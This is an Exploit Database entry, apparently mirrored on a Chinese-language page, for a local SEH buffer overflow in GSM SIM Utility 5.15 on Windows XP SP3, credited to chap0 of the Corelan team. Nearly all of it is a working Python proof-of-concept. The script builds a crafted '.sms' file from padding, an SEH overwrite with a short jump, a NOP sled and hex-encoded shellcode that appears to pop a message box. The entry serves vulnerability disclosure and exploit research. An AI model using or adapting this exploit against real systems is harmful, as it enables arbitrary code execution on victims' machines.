GSM SIM Utility 5.15 – ‘.sms’ File Local Buffer Overflow (SEH)

• Exploit Database
• 11 阅读

• 作者： chap0
  日期： 2010-06-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14098/

• # Exploit Title : GSM SIM Utility sms file Local SEH BoF
  # Date: June 28, 2010
  # Author: chap0 [www.seek-truth.net]
  # Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol 
  # Version : 5.15
  # OS: Windows XP SP3
  # Type of vuln: SEH
  # Greetz to : Corelan Security Team * Special Greetz to Lincoln
  # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
  # The Crew	: http://www.corelan.be:8800/index.php/security/corelan-team-members/
  #
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # Corelan does not want anyone to use this script
  # for malicious and/or illegal purposes
  # Corelan cannot be held responsible for any illegal use.
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  #
  # Code:
  import time
   
  print	"|------------------------------------------------------------------|" 
  print "| __ __|" 
  print "| _________________/ /___ _____ / /________ _____ ___|" 
  print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" 
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |" 
  print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|" 
  print "||" 
  print "|-------------------------------------------------[ EIP Hunters ]--|" 
  print	"[+] GSM SIM Utility SEH Local Exploit\n"
  
  	
  
  sc =("d9eb9bd97424f431d2b27a31c964"
  "8b71308b760c8b761c8b46088b7e"
  "208b36384f1875f35901d1ffe160"
  "8b6c24248b453c8b54057801ea8b"
  "4a188b5a2001ebe337498b348b01"
  "ee31ff31c0fcac84c0740ac1cf0d"
  "01c7e9f1ffffff3b7c242875de8b"
  "5a2401eb668b0c4b8b5a1c01eb8b"
  "048b01e88944241c61c3b20829d4"
  "89e589c2688e4e0eec52e89cffff"
  "ff894504bb7ed8e273871c2452e8"
  "8bffffff894508686c6c20ff6833"
  "322e646875736572885c240a89e6"
  "56ff550489c250bba8a24dbc871c"
  "2452e85effffff68703058206820"
  "6368616864204279686f69746568"
  "4578706c31db885c241289e3686b"
  "58202068426c6163687468652068"
  "75676820685468726f31c9884c24"
  "1189e131d252535152ffd031c050"
  "ff5508")
  
  buf= "A" * 1834 
  buf+= "eb069090"
  buf+= "F25E4300"
  buf+= "90" * 20
  buf+= sc
   
  try:
   crash = open("hacked.sms",'w')
   crash.write(buf)
   crash.close()
   print "[+] Visit www.corelan.be port 8800!\n" 
  except:
   print "Error occured, look at the code!\n"
  time.sleep(2)
  
  print"[+] Exploit file created!\n"